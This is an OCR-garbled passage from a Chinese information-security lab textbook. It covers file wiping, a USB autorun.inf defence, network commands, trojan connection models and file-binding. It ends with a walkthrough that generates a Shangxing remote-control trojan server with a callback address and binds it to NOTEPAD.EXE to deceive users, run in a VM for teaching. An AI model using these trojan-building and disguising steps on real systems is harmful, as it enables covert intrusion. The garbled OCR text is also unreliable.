利用 Eraser 擦 除 实践 文件 ,测试 EasyRecovery 的 文件 恢复 能 力 。 启 动 Eraser 后 显示 
如 图 9-25 所 示 的 主 界面 。 

9-25 中 Settings 选项 卡 显 示 软 件 设 定 的 擦 除 措施 ,默认 Gutmann( 古 特 曼 ) 算 法 , 进 
行 35 次 擦 除 。 实 践 中 右 击 要 删除 的 文件 ,弹出 如 图 9-26 所 示 的 右键 菜单 Eraser, 即 可 删除 
文件 3. png。 
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Qo Eraser s oe 


© Settings 
Shell integration 
User interface language: [Engish x) 


[F Integrate Eraser into Windows Explorer 


m 


Erase settings 


Default file erasure method: 
Default unused space erasure method: 
US DoD 5220.22-M (8-306./E. C & E) (7 passes) 
Randomness data source: RCMP TSSIT OPS-II (7 passes) 
国 Force locked files to be unlocked for etSchneier 7 pass (7 passes) 
° >r “Í German VSITR (7 passes) 
[E Replace erased files with the following US DoD 5220.22-M (8-306./E) (3 passes) Add Remove 
British HMG ISS (Enhanced) (3 passes) 
US Air Force 5020 (3 passes) 
US Army AR380-19 (3 passes) 
Russian GOST p50739-95 (2 passes) 
British HMG 1S5 (Baseline) (1 pass) 
Pseudorandom Data (1 pass) 
First/last 16KB Erasure 


图 9-25 Eraser 主 界面 
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T $8 Adobe PDF(B) 
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图 9-26 ”右键 菜单 Eraser 


使 用 恢复 软件 EasyRecovery 扫描 恢复 ,依据 图 9-20 的 设置 规定 恢复 文件 类 型 png, 可 


以 加 快 扫描 速度 。 
6) 移动 设备 防 病毒 感染 


autorun. inf 是 Windows 系统 中 比较 常见 的 文件 之 一 ,其 作用 是 允许 在 双击 磁盘 时 自 


动 运行 指定 的 某 个 文件 。 但 是 也 出 现 了 用 autorun. inf 文件 传播 木马 或 病毒 , 它 通过 使 
的 误 操作 让 目标 程序 执行 ,达到 侵入 计算 机 的 目的 , 带 来 了 很 大 的 负面 影响 。 


者 


解决 的 方法 有 通过 组 策略 ,启动 “计算 机 配置 一 管理 模板 一 系统 一 关闭 自动 播放 ”策略 。 
另 一 个 方法 是 在 移动 磁盘 如 U 盘 的 根 目录 下 创建 自己 特制 的 autorun. inf 文件 ,使 木马 或 
病毒 在 感染 U 盘 时 ,发 现存 在 autorun. inf 时 则 一 般 不 会 去 感染 。 如 果 有 的 木马 或 病毒 可 
能 企图 删除 并 新 建 autorun. inf 文件 ,但 删除 或 替换 特制 的 autorun. inf 文件 会 失败 ,以 致 阻 


止 病毒 感染 U 盘 的 企图 。 在 U 盘 根 目录 下 新 建文 本 文档 ,输入 : 


md autorun. inf 

cd autorun. inf 

md prn\ 

md pig..\ 

cd 

attrib +s + h autorun. inf 


然后 将 此 文件 扩展 名 . txt 改 为 批 处 理 文件 . bat, 双 击 批 处 理 文件 即 可 在 U 盘 根 目录 下 
自动 生成 antorun. inf 文件 夹 ,如 图 9-27 所 示 。 


2014/3/62021 — Windows MANH. 


9-27 ”特制 的 autorun. inf 文件 


用 常规 的 方式 无 法 删除 antorun. inf 文件 夹 ,但 用 360 文件 粉碎 机 是 可 以 删除 的 。 
6. 思考 题 


(1) 如 何 防止 数据 被 恶意 恢复 ? 使 用 安全 删除 软件 (文件 粉碎 机 ) 粉 碎 数据 是 否 能 保证 
不 被 恶意 恢复 ? 

(2) 将 移动 设备 如 U 盘 、 照相机、 手机 或 摄像 机 等 借 给 他 人 ,有 什么 风险 吗 ? 如 何 
规避 ? 


1. 实践 目的 
理解 木马 的 工作 原理 。 
2. 实践 环境 


(1) £ À Internet 的 计算 机 一 台 , 安 装 Windows XP, Windows 7 或 
Windows 8 等 操作 系统 。 

(2) 实践 工具 : ExplorerSuite, Restorator2007, 360 安全 卫士 ， 
ESET,procexp , 沙 箱 Sandboxie, Wireshark. 


3. 名 词 解释 


(1) 端口 : Internet 通信 的 最 终 目的 是 使 一 个 进程 能 够 和 另 一 个 进 
程 通信 。 为 了 能 同时 运行 多 个 进程 ,需要 对 不 同 的 进程 打上 标号 ,给 一 
个 进程 指派 的 标号 叫做 端口 地 址 。TCP/IP 中 的 端口 地 址 是 16 位 长 。 

(2) 主动 端口 和 被 动 端口 : 主动 端口 是 主动 发 起 网 络 连接 的 进程 所 
创建 的 端口 ,是 指 C/S 和 B/S 通信 模式 中 的 客户 端 ; 被 动 端口 是 等 待 外 
来 网 络 连 接 请 求 的 进程 所 创建 的 端口 ,是 指 C/S 和 B/S 通信 模式 中 的 服 
务 端 。 

(3) 反弹 端口 型 木马 : 服务 端 (被 控制 端 ) 使 用 主动 端口 ,客户 端 ( 控 
制 端 ) 使 用 被 动 端口 ,由 木马 的 服务 端 主动 向 客户 端 发 起 网 络 连 接 。 

(4) 沙 箱 : 是 一 个 虚拟 系统 程序 ,在 沙 箱 环境 中 运行 浏览 器 或 其 他 
程序 ,运行 所 产生 的 变化 可 以 随后 删除 。 

(5) HIPS: Host-based Intrusion Prevention System, 基 于 主机 的 入 
侵 防御 系统 ,是 一 种 能 监控 计算 机 中 文件 的 运行 和 文件 运用 其 他 文件 以 
及 文件 对 注册 表 的 修改 ,并 报告 请 求 允 许 的 软件 。 


4. 预备 知识 


1) TCP/IP 协议 
网 络 通 信 协 议 是 Internet 最 基本 的 协议 ,是 国际 互联 网 络 的 基础 ,由 
网 络 层 的 IP 协议 和 传输 层 的 TCP 协议 组 成 。TCP/IP 定义 了 电子 设备 
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如 何 连 入 Internet, 以 及 数据 如 何在 它们 之 间 传 输 的 标准 。 协 议 采 用 了 四 层 的 层级 结构 ,每 
一 层 都 呼叫 它 的 下 一 层 所 提供 的 协议 来 完成 自己 的 需求 。 图 10-1 所 示 为 进程 通信 的 地 址 
分 类 。 

每 一 种 地 址 都 与 TCP/IP 体系 结构 中 的 特定 层 相 
对 应 ,分 为 3 个 等 级 的 地 址 。 进程 

(1) 地 址 : 对 应 数据 链 路 层 和 物理 层 ， -局 

(2) IP 地 址 : 对 应 卫 层 ,用 于 网 络 上 的 计算 机 或 iP 和 其 他 协议 | |= | Pen 
智能 终端 寻 址 。 — 

G) 端口 地 址 : 对 应 TCP 和 UDP 层 , 用 于 计算 机 || 底层 物理 网 络 || ——| 物理 地 址 
或 智能 终端 上 的 进程 寻 址 。 

木马 按照 通信 协议 分 类 ,常见 的 种 类 有 TCP 型 木 。 ”图 10-1 进程 通信 的 地 址 分 类 
马 (是 主流 木马 ,如 冰河 、 灰 鱼子 、 上 兴 等 )`\UDP 型 木 
马 ( 如 神气 儿 等 ) ICMP 型 木马 (如 lionbackdoor 等 ) 。 

通信 协议 的 解释 如 下 。 

(1) TCP 协议 (Transmission Control Protocol) 是 面向 连接 的 .可 靠 的 传输 协议 ,负责 发 现 
传输 的 问题 ,一 有 问题 就 发 出 信和 号, 要求 重新 传输 ,直到 所 有 数据 安全 正确 地 传输 到 目的 地 。 

(2) UDP 协议 (User Datagram Protocol) 是 用 户 数据 报 协议 ,一 种 无 连接 的 传输 层 协 
议 ,提供 面向 事务 的 简单 不 可 靠 信息 传送 服务 

(3) ICMP 协议 (Internet Control Message Protocol) 是 Internet 控制 报 文 协议 。 它 是 
TCP/IP 协议 族 的 一 个 子 协议 ,用 于 在 IP 主机 、 路 由 器 之 间 传 递 控 \。 控 制 消息 是 指 
网 络 通 不 通 、 主 机 是 否 可 达 、 路 由 是 否 可 用 等 网 络 本 身 的 消息 ,这 些 控制 消息 对 于 用 户 数 据 
的 传递 起 着 重要 的 作用 。 将 携带 的 控制 消息 改 为 用 户 数据 ,就 是 ICMP 木马 。 

Windows 的 网 络 命令 行程 序 在 C:\Windows\System32 目录 下 ,常用 的 有 以 下 几 种 。 

(1) ipconfig /all: Ipconfig. exe 命令 可 以 查看 网 络 连 接 的 情况 ,例如 本 机 的 IP 地 址 、 子 
网 掩 码 .DNS 配置 .DHCP 配置 等 ,/all 参数 就 是 显示 所 有 配置 的 参数 ,如 图 10-2 所 示 。 
© ee 


(E ERA CAWindowsystem emdee 


图 10-2 ipconfig/all 命令 
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在 图 10-2 rh; 

O 物理 地 址 : 也 称 为 网 卡 地 址 或 硬件 地 址 ,一般 不 会 变更 。 

D IPv4 地 址 : 即 是 常 说 的 IP 地 址 ,通常 采用 动态 获取 的 方式 ,计算 机 所 在 的 网 络 不 
同 ,IP 地 址 会 随 之 变化 。 

@ 默认 网 关 : 是 计算 机 所 在 局 域 网 络 的 出 口 ,也 称 为 路 由 器 IP 地 址 ,通常 采用 动态 获 
取 的 方式 。 

(2) ping: ping 命令 可 以 检查 网 络 是 否 连 通 , 可 以 分 析 和 判定 网 络 故障 。 利 用 网 络 上 
机 器 IP 地 址 的 唯一 性 ,给 目标 IP 地 址 发 送 数据 包 ( 称 为 ping 包 ) ,一 般 是 4 个 ,再 要 求 对 方 
返回 一 个 同样 大 小 的 数据 包 来 确定 两 台 网 络 机 器 是 否 连 接 相通 ,时 延 是 多 少 。 时 延 越 大 , 速 
度 越 慢 ,如 图 10-3 所 示 。 
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图 10-3 ping 命令 


在 图 10-3 中 ,192. 168.0. 1 是 ping 的 参数 ,也 可 以 直接 输入 域名 地 址 如 www. baidu. com, 
例如 输入 “ping www. baidu. com”, Windows 防火 墙 一 般 会 阻 断 外 来 的 ping 包 , 使 ping 失 
败 , 因 此 对 实践 系统 测试 网 络 连接 时 ,需要 关闭 其 Windows 防火 墙 。 如 果 计 算 机 上 网 出 现 
问题 如 无 法 打开 百度 网 页 等 ,一 般 的 处 理 步 又 如 下 。 

O “ping 127.0.0.1”, 其 中 127. 0. 0. 1 是 回 送 地 址 ,测试 本 机 TCP/IP 协议 是 否 正常 。 

@ ping 本 机 IP 地 址 是 否 正 常 ,如 “ping 192. 168. 0. 104”。 

© ping 所 在 网 络 默 认 网 关 是 否 正常 ,如 “ping 192. 168. 0. 1”。 

@ ping 百度 网 站 的 IP 地 址 是 否 正常 .如 “ping 115. 239. 210. 27”。 

如 果 以 上 皆 没 问题 , 则 说 明 网 络 是 连通 的 ,可 能 是 浏览 器 或 域名 解析 出 了 问题 ,需要 
查 毒 。 

(3) arp: 地 址 解析 协议 , 即 ARP(Address Resolution Protocol) 。 计 算 机 中 的 ARP 组 
存 是 个 用 来 储存 IP 地 址 和 MAC 地 址 的 缓冲 区 ,其 本 质 就 是 一 个 IP 地 址 一 MAC 地 址 的 对 
应 表 , 表 中 每 一 个 条 目 分 别 记录 了 网 络 上 其 他 主机 的 IP 地 址 和 对 应 的 MAC 地 址 。 使 用 
arp 命令 可 以 解决 硬件 地 址 问题 ,常见 用 法 为 “arp -a”, 用 于 查看 缓存 中 的 所 有 项 目 。 

(4) netstat: netstat 命令 的 功能 是 显示 网 络 连接 、 路 由 表 和 网 络 接口 信息 ,可 以 让 用 户 
得 知 有 哪些 网 络 连接 正在 运作 。 一 般 用 法 为 “netstat -an -0”, 输 出 如 图 10-4 所 示 。 


图 10-4 netstat 命令 


在 图 10-4 中 ,IP 地 址 为 127. 0.0. 1 的 1081 端口 和 1082 端口 成 功 建立 连接 ,遵循 TCP 
协议 ,是 由 3468 进程 创建 的 。 由 任务 管理 器 查 到 3468 进程 是 由 SRun3K. exe 建立 的 , 即 深 
澜 宽 带 用 户 端 进程 。 命 令 *netstat -an -o 二 1. txt" 将 显示 的 网 络 连接 信息 重 定向 输入 文件 
1. txt 中 ,而 不 是 打印 到 屏幕 上 。 建 立 批 处 理 文件 : netstat_my. bat。 代 码 如 下 所 示 。 


@echo off 

echo 正在 扫描 目标 主机 ,请 稍 等 … 
netstat -an -o>1.txt 

echo 扫描 完成 ! 

echo. & pause 


Wireshark 是 功能 强大 的 网 络 协议 包 分 析 工 具 , 主 要 作用 是 尝试 捕获 网 络 包 ,并 显示 包 
的 尽 可 能 详细 的 情况 ,可 以 当成 是 一 种 用 来 测量 有 什么 东西 从 网 线 上 进出 的 测量 工具 。 
Wireshark 的 主 界面 如 图 10-5 所 示 。 


test.pcap - Wireshark 


Ele Edt wew Go Capture Analyze Statistics Help 


Who has 192.168.0.2? Gratuitous / 
192.168.0.2 Name query NBSTAT *<00> <00> <00> <0 


192.168.0.2 224.0.0.22 V3 Membership Report 


9 1.082038 192.168.0.2 192.168.0.255 NBNS Registration NB NB10061D<00> 


11.2210 192.108.0.2 192.168.0.1 http SYN] send Len=0 MeS 


a a) 

田 Frame 11 (62 bytes on wire, 62 bytes captured) 

四 Ethernet II, Src: 192.168.0.2 (00:0b:5d:20:cd:02), Dst: Netgear_2d:75:9a (00:09:5b:2d:75:9a) 
Œ Internet Protocol, Src: 192.168.0.2 (192.168.0.2), Dst: 192.168.0.1 (192.168.0.1) 

= 


Source port: 3196 (3196) 
Destination port: http (80) 
Sequence number: O (relative sequence number) 
Header length: 28 bytes 
田 
Window size: 64240 


030 aoo e0 00 00 02 04 05 b4 


Fie: "D:ftest.pcap" 14 KB 00:00:02 P: 120 D: 120 M: 0 É 


10-5 Wireshark 主 界面 


Wireshark 逐条 显示 捕获 到 的 网 络 包 信息 .选中 某 一 网 络 包 则 界面 中 部 按 TCP/IP 协 
议 分 析 包 数据 ,界面 下 部 显示 网 络 包 的 原始 数据 。 

2) 木马 通信 模式 

木马 指 附 着 在 应 用 程序 中 或 者 单独 存在 的 一 些 恶 意 程序 ,可 以 实现 对 被 植 入 了 木马 程 
序 的 目标 计算 机 的 控制 ,或 者 窃取 感染 木马 程序 的 计算 机 上 的 数据 。 木 马 程序 通常 是 目标 
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用 户 被 欺骗 之 后 自己 触发 执行 的 。 流 行 的 远程 控制 木马 有 冰河 、 网 络 神偷 、 广 外 女生 、 网 络 
公牛 黑洞 上 兴 、 彩 虹桥 .PCShare、 灰 饮 子 等 。 木 马 通信 模式 一 般 有 正 向 型 和 反 向 型 。 

正 向 型 通信 模式 如 图 10-6 所 示 , 木 马 在 被 控 端 启动 后 创建 被 动 端口 开始 监听 ,等 待 外 
来 网 络 连接 请 求 , 也 称 为 木马 服务 端 。 控 制 端 创建 主动 端口 ,主动 发 起 网 络 连 接 请 求 , 称 为 
木马 客户 端 。 木 马 服 务 端 接收 到 网 络 连 接 请 求 后 ,经 过 身份 验证 后 建立 网 络 连接 。 木 马 客 
户 端 发 布 命令 ,木马 服务 端 依据 命令 收集 信息 后 ,经 压缩 加 密 后 返回 给 木马 客户 端 。 配 置 程 
序 用 于 配置 和 生成 木马 服务 器 。 


控制 端 程序 


Ë. 序 
发 送 命令 被 控制 端 程序 
主动 端口 | 人 一 >》 | 被动 端口 
返回 结果 - 
配置 程序 木马 服务 端 


木马 客户 端 
图 10-6 正 向 型 木马 


防火 墙 对 于 连 入 的 连接 往往 会 进行 非常 严格 的 过 滤 ,但 是 对 于 连 出 的 连接 却 疏 于 防范 ， 
特别 是 当 对 外 访问 Web 网 站 (80 端口 ) 和 FTP 网 站 (21 端口 ) 时 ,防火 墙 是 不 会 拦截 的 。 因 
此 反 向 型 通信 模式 是 当前 的 主流 模式 ,如 图 10-7 所 示 。 木 马 客 户 端的 IP 地 址 通常 是 随机 
的 , 即 每 次 进入 Internet 所 分 配 的 IP 地 址 不 一 样 ,为 了 让 木马 服务 端 能 知道 木马 客户 端的 
IP 地 址 和 监听 端口 ,需要 Internet 中 的 某 个 网 站 作为 中 转 站 ,一般 是 租用 某 个 网 络 空间 作 


为 这 样 的 网 站 ,具体 步 又 如 下 。 
Web 或 FTP 网 络 空间 
配置 文件 
2) 下 载 


Etl ( 


= (3) 连 接 请 求 
控制 端 程序 | | 一 一 一 一 | E 
(5) 发 送 命令 


被 动 端口 | 《一 一 > | 主动 端口 
(6) 返 回 结果 


—— KIRK 
[erer] | -oe 


木马 服务 端 
图 10-7 反 向 型 木马 


(1) 木马 客户 端 进入 Internet 后 ,立刻 向 网 络 空间 上 传 配 置 文件 。 配 置 文件 包含 当前 
自身 的 IP 地 址 ,监听 端口 ,通信 密 钥 .更 新 信息 等 信息 。 

(2) 木马 服务 端 启动 后 ,访问 网 络 空间 (初始 的 网 络 空间 地 址 是 在 生成 服务 器 时 就 已 经 
植 人 ,运行 中 可 以 变化 ) ,下 载 配 置 文件 ,解析 后 更 新 木马 客户 端 TP 地 址 ,监听 端口 .通信 密 
钥 ,以 及 其 他 信息 。 这 里 的 其 他 更 新 信息 包括 木马 功能 升级 和 新 的 网 络 空间 地 址 等 。 

(3) 向 木马 客户 端 发 起 网 络 连接 请 求 。 

(4) 木马 客户 端 经 过 身份 验证 后 建立 网 络 连接 。 


(5) 发 布 命令 。 

(6) 返回 结果 。 

3) 文件 捆绑 

将 多 个 文件 合并 为 一 个 新 文件 ,新 文件 运行 后 ,将 合并 的 文件 分 离 出 来 ,并 分 别 运行 , 称 
为 文件 捆绑 。 文 件 捆绑 是 木马 或 流氓 软件 常用 的 技术 ,一 般 有 文件 填充 式 捆 绑 和 资源 包裹 
式 捆绑 的 形式 。 

(1) 文件 填充 式 捆绑 。 

文件 填充 式 捆绑 是 指 将 某 个 文件 如 B. exe 附加 到 A. exe 的 末尾 。 这 样 当 A. exe 被 执 
行 的 时 候 ,B. exe 也 跟着 执行 了 ,捆绑 后 文件 的 结构 如 图 10-8 所 示 。 

图 10-8 中 的 主 文件 也 称 为 分 离 器 。 主 文件 启动 后 : 

© 利用 函数 GetModuleFileName() 获 取 自身 的 文件 路 径 ， 
获取 文件 的 大 小 并 分 配 内 存 ,用 函数 fread() 读 取 文 件数 据 到 内 : 
存 区 中 。 绑 定 文件 / 

@ 读 取 文 件 尾 的 各 个 绑 定 文件 的 长 度 1 到 ,分 别 定位 到 
内 存 区 的 数据 后 ,依次 用 函数 fwrite() 在 硬盘 上 创建 新 文件 1 
到 ”并 将 各 个 文件 的 内 存 数据 写 信 这些 文件 。 图 10-8 捆绑 文件 结构 

© 利用 函数 CreateProcess 运行 新 文件 1 到 ,为 避免 这 些 
文件 运行 时 在 任务 栏 和 窗口 上 显示 ,可 以 使 用 以 下 函数 修改 窗口 的 风格 和 窗口 大 小 。 


绑 定 文件 1 


ModifyStyleEx(WS EX_APPWINDOW, WS EX TOOLWINDON); // 修 改 窗 口 的 风格 ,使 任务 栏 不 显示 
MoveWindow(m_hWnd,0,0,0,0,TRUE); // 使 窗口 的 大 小 为 0 而 不 显示 


这 样 一 来 ,就 只 看 见 主 文件 运行 界面 ,而 看 不 到 其 他 程序 已 经 运行 起 来 了 。 

(2) 资源 包 庄 式 捆绑 。 

资源 是 EXE 文件 中 的 一 个 特殊 区 段 , 可 以 用 来 包含 软件 需要 /不 需要 用 到 的 任何 东西 。 
而 资源 是 由 一 系列 资源 文件 (具有 res 文件 扩展 名 ) 组 成 的 ,包含 着 无 须 重新 编辑 代码 便 可 
以 改变 的 位 图 .对话 框 .字符 串 .菜单 .工具 栏 . 控 件 和 其 他 自 定 义 的 资源 。 

利用 Restorator {T IFAR RS F KIFE hlm Client. exe 文件 ,图 10-9 显示 了 该 程序 的 所 有 资 
源 信息 ,其 中 对 话 框 102 是 控制 端的 主 界面 窗口 ,进入 编辑 模式 则 可 以 进行 修改 或 增加 。 


ies Res or 2007 -FF:\ 安 全 \ 灰 秽 子 远程 管理 软件 \Client\Debug\Client. exe 
文件 全 Y ERV 编辑 FE) IAW 帮助 加 


D Gi- mana B D @ mmn: 
san 


资源 查看 器 | 文件 浏览 器 | 


[=== | ==== || === | esm [emesa] 


[EE 


图 10-9 ”对话 框 102 资源 
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图 10-10 显示 了 自 定义 的 资源 UPX 的 二 进 制 数据 。UPX 是 一 个 加 壳 的 软件 工具 ,而 
这 个 资源 所 包含 的 信息 就 是 UPX 软件 的 二 进 制 数据 流 ,开始 处 的 两 个 字 节 MZ(4D 5A) 即 
是 exe 文件 特征 签名 (参见 实践 5) ,可见 UPX 资源 是 明文 未 加 密 的 。 


XPO HAA SERV RAT IAV 帮助 四 


Da- amare waswua. mj EN: | 


BEES IARE 


sa 80000300000 0 XE 

Donoro; Be 0000 0000 00 000040000000 00 0000 no 9 

0000020. 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 

0000030. 00 00 00 00 00 00 00 00 00 00 0000 80 00 00 00 

00000040: 0E 1p BA 0E 0034 03CD 21 D801 4CCD215468 . P ?99L?Th 

00000050: 69732070726F6772616D2065616E6E6F 1s program canno 

00000060: 742062652072756E20696E20444F5320 t be run in DOS 

00000070: 6D6F64652E0DOD ok 2400000000000000 mode... . $.. 

ooonso， So45 00 004c ot 03000000000000000000 PE. L 

00000030; 00000000E0000F030D01023800700400 ..._?..... 8p. 

Poooooao: 0010000000501300 50BA 170000601300 

= [foooooono: 00no17o0000040000010000000020000 _?. 
Doooooco: 04 00 00 o0 o1 00 00 00 04 00 00 00 00 00 00 00 

ooooonpo， ooEo1700001000000000000003000000 .了 

0000oE0: 00 0020 00 0010 00 00 00001000 001000 00 

一 jwoooooro，ooooonoolooooooooooooooonoooonon aki EJ 
umeki me j] i Ë 


图 10-10 ”UPX 资源 


木马 通常 利用 自 定 义 资 源 的 方法 拥 绑 多 个 恶意 文件 ,这 些 文件 一 般 是 经 过 加 密 后 添 
加 到 自 定义 资源 中 的 ,这 使 杀毒 软件 难以 检测 。 所 谓 的 木马 生成 器 ,也 就 是 如 图 10-9 所 
示 的 “配置 服务 端 ?按钮 的 功能 ,是 利用 资源 更 新 、 替 换 的 方法 实现 新 木马 的 生成 , 需 用 到 
BeginUpdateResource UpdateResource 和 EndUpdateResource 这 3 个 Windows 的 API 
函数 。 

当 携 带 这 样 资源 的 EXE 文件 运行 后 ,利用 资源 查找 ,加载 .锁定 读 取 的 方法 分 离 资源 中 
的 文件 数据 , 需 用 到 FindResource, LoadResource, LockResource 这 3 个 Windows 的 API 
函数 ,分 离 出 的 文件 数据 如 上 述 方法 创建 新 文件 并 运行 。 

木马 或 流氓 软件 常用 这 种 技术 将 自身 代码 隐藏 到 正常 的 软件 中 ,特别 是 一 些 软 件 安装 
程序 ,因此 使 用 免费 软件 时 ,到 一 些 声誉 好 的 网 站 下 载 可 以 保证 基本 安全 。 

上 述 的 两 种 文件 拥 绑 方 式 都 有 一 个 共同 的 特点 是 , 先 创建 新 文件 然后 再 运行 ,一般 杀毒 
软件 都 会 提前 进行 拦截 并 扫描 文件 ,如 果 是 恶意 病毒 或 木马 则 禁止 运行 ,而 对 于 被 杀毒 软件 
忽视 的 流氓 软件 来 讲 显得 更 加 适用 些 。 如 果 不 创建 新 文件 而 在 内 存 中 直接 运行 , 则 杀毒 软 
件 就 难以 检测 了 。 

4) 沙 箱 

沙 箱 可 以 看 作 是 一 种 容器 ,里 面 所 做 的 一 切 都 可 以 推倒 重 来 。 沙 箱 是 HIPS 中 的 一 种 ， 
称 为 沙 箱 HIPS。 沙 箱 是 一 种 按照 安全 策略 限制 程序 行为 的 执行 环境 , 现 途径 一 般 是 通过 
拦截 系统 调用 ,监视 程序 行为 ,然后 依据 用 户 定义 的 策略 来 控制 和 限制 程序 对 计算 机 资源 的 
使 用 ,例如 改写 注册 表 , 读 写 磁盘 等 ,另外 可 以 用 于 测试 可 疑 软件 ,为 了 试用 某 种 病毒 或 者 不 
安全 软件 ,可 以 将 它们 在 沙 箱 环境 中 运行 。 

随 着 网 络 安全 问题 的 日 益 突出 ,更 多 地 将 沙 箱 技术 应 用 于 网 上 冲浪 方面 。 从 技术 实现 
角度 而 言 ,就 是 从 原 有 的 阻止 可 疑 程序 对 系统 访问 ,转变 成 将 可 疑 程序 对 磁盘 、 注 册 表 等 的 
访问 重 定向 到 指定 文件 夹 下 ,从 而 消除 对 系统 的 危害 。 

主流 沙 箱 软 件 有 defensewall.geswall.bufferzone 和 sandboxie 等 ,其 中 sandboxie 比较 
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有 代表 性 , 即 能 实现 对 计算 机 的 局 部 进行 保护 ,例如 可 以 很 灵活 地 设置 一 个 或 几 个 觉得 “ 危 
险 ” 的 程序 运行 在 “ 沙 箱 ”, 而 其 他 一 切 则 正常 运行 ,又 能 如 “影子 系统 "一样 提供 整个 计算 机 
的 保护 。 在 Sandboxie 中 选择 “功能 ”菜单 ,然后 选择 “运行 沙 箱 ” 一 “Windows 资源 管理 
器 ”, 就 会 自动 弹出 有 两 个 “[ 井 ]” 符 号 的 “我 的 电脑 窗口 ,之 后 对 整个 计算 机 进行 任意 操作 ， 
包括 格式 化 分 区 、 删 除 文件 、 复 制 文件 等 都 很 安全 。 人 恢复 的 方法 很 简单 。 在 Sandboxie 主 界 
面 选择 “配置 ”>“ 沙 箱 设置 ">“ 设 置 自动 清理 ”选项 ,将 隔离 层 中 的 内 容 清 除 即 可 。 


5. 实践 操作 及 步骤 


1) 上 兴 远 程控 制 实践 

(1) 木马 生成 与 安装 。 

关闭 杀毒 软件 ,解压 上 兴 木 马 压 缩 包 ,打开 rejoice. exe 控制 端 主 程序 窗口 ,如 图 10-11 
所 示 o 


上 兴 远 程控 制 2013SP2 WAN:No LAN:192. 168. 0. 105 š Loia] 


Qa fe Am Eg D) Q 4) 2z F) & == 


运程 上 战 主机 分 粗 [SEE7TTT 


HE ~ 北京 ME +i FFELP 打开 网 页 综合 功能 ms 。 修改 @ se 
打开 60 铺 口 成 功 , FRENE | 


图 10-11 上 兴 木 马 控 制 端 界面 


将 上 线 端 口 改 为 80, 则 控制 端 在 80 端口 开始 监听 ,在 cmd 终端 用 netstat -an -o 命令 可 
以 看 到 ,控制 端 (PID 二 1216) 正 在 80 端口 监听 .如 图 10-12 所 示 。 


Foreign Address State 
08.0.0.0:0 LISTENING 
B-B-B-9:B LISTENING 


图 10-12 netstat -an -o 命令 


单 击 工具 栏 上 的 “生成 ”按钮 ,打开 如 图 10-13 所 示 的 “上 兴 远 控 生 成 服务 端 辅助 ”对 话 
框 ,其 中 IP 地 址 192. 168. 0. 103 是 控制 端 所 在 计算 机 的 IP 地 址 ,依据 自己 的 机 器 修改 。 
QQMin. exe 是 开机 启动 的 木马 程序 ,安装 路 径 *MSInfo 目录 ”具体 是 指 C:\Program Files\ 
Common Files\Microsoft Shared\ MSINFO 文件 夹 .选择 “插入 IE” 和 “服务 启动 ”功能 (其 他 
选项 请 自行 分 析 ) ,这 里 提取 “notepad. exe” 的 图 标 , 最 后 单 击 “ 生 成 服务 端 " 按 钮 , 则 默认 在 
当前 目录 下 生成 Sx_server. exe 的 服务 端 ,如 图 10-14 所 示 。 另 外 12012. ini 是 配置 文件 , 配 
置信 息 会 随 之 更 新 ,配置 文件 对 网 络 连接 很 重要 。 


上 兴 远 控 生成 服务 端 辅助 
http 访 问 地 址 、 昌 空间、 网 盘 、DNS 域 名 解析 或 静态 IP Mire LERO: 


192. 168. 0. 103 [e0 
备用 地 址 OfTP/DRS/Qzone/IP) :|192 168. 0. 103 

安装 名 称 : qqmin_ exe HRR: | zmmfe 
安装 路 径 : | WSInfo 目 录 4 

备注 ; |20130522 RHE: M 


K 插入 IE 厂 插入 系统 进程 工厂 不 插入 运行 M 正规 运行 
F 服务 启动 ” 厂 MEEI M 安装 后 自 峰 除 M MUS WR: |1234 
服务 名 称 : 


Wingvod 


服务 显示 名 
ss 一， 一 


服务 描述 : 
[FEB | 
随机 生成 服务 篇 


厂 Aah N 版 本 Ñ 签名 添加 文件 版 本 数字 签名 mah + 


[DAT 368240. dat | 


图 10-13 服务 端 生 成 对 话 框 


文件 MEO SEV KEW IAV EMW LJ 
Qa- O- 5 Pm gy xx (m 
MED [Oc Ne gara 
LHR x ai a 
m 35 软盘 a) WX 
日 SFERA C) = MO ini | B 
sl! 属 Sx_server. exe 


图 10-14 生成 服务 端 Sx_server. exe 


将 服务 端 Sx_server. exe 复制 到 虚拟 机 Windows XP 系统 中 ,双击 运行 即 可 。“ 上 兴 远 控 生 
成 服务 端 辅助 "对话 框 提 供 拥 绑 的 辅助 功能 ,用 于 提高 欺骗 性 。 单 击 “ 拥 绑 辅助 按钮 , 则 出 现 
扩展 对 话 框 如 图 10-15 所 示 ,捆绑 的 第 一 个 文件 一 般 选 择 前 面 生 成 好 的 Sx_server. exe, 183 
的 第 二 个 文件 选择 用 于 欺骗 的 文件 ,图 10-15 中 选择 NOTEPAD. EXE, 拥 绑 后 的 合并 文件 
名 也 为 NOTEPAD. EXE, 也 可 以 选择 其 他 文件 如 “示例 . doc”, 则 合并 文件 名 设 为 “ 示 
fl. doc. exe”. 

单 击 图 10-15 中 “开始 捆绑 ?按钮 , 则 在 当前 目录 下 生成 NOTEPAD. EXE #4 fka 
含 Sx_server. exe 木马 安装 程序 和 NOTEPAD. EXE 记事 本 程序 ) ,大 小 为 848KB, 正 常 的 
记事 本 程序 大 小 为 65KB, 如 图 10-16 所 示 。 

将 捆绑 文件 NOTEPAD. EXE 复制 到 虚拟 机 XP 系统 中 ,双击 运行 , 则 实现 以 下 功能 。 

(D 分 离 出 Sx_server. exe 文件 释放 到 Program File 文件 夹 下 ,并 在 后 台 运 行 , 如 果 设 置 
了 “运行 后 自 删除 ”, 则 安装 木马 设置 后 自 删除 。 

© 分 离 出 NOTEPAD. EXE 文件 释放 到 C 盘 根 目 录 下 .并 运行 记事 本 程序 。 


RWD: mIa- 
80 第 一 个 文件 : C: \1\ 上 兴 远 程控 制 \Sx_server. exe P 
第 二 个 文件 : |C: 1 ANOTEPAD EXE P 
|: [znufe MEL: |C: \1\ 上 兴 远 程控 制 \NOTEPAD. EXE 四 w amta 
第 一 个 文件 释放 到 ; [Prog Files ` 加 密 密 匙 : [201305 
厂 释放 不 运行 M 是 否 压缩 厂 运行 后 自 删除 
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= ERUEEFTP/YEBIRS 
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RRB | mn: [21 用 户 名 : F 匿名 登陆 
打开 IC0 图 标 | 连接 数 : 回 密码 : 开局 停止 
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图 10-15 “捆绑 辅助 "对 话 框 
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10-16 生成 捆绑 文件 


© 拥 绑 文 件 NOTEPAD. EXE 如 果 设 置 了 “运行 后 自 删 除 ”, 则 自 删除 。 

捆绑 文件 秘密 安装 木马 具有 一 定 的 欺骗 性 ,其 本 质 和 直接 运行 Sx_server. exe 的 功能 
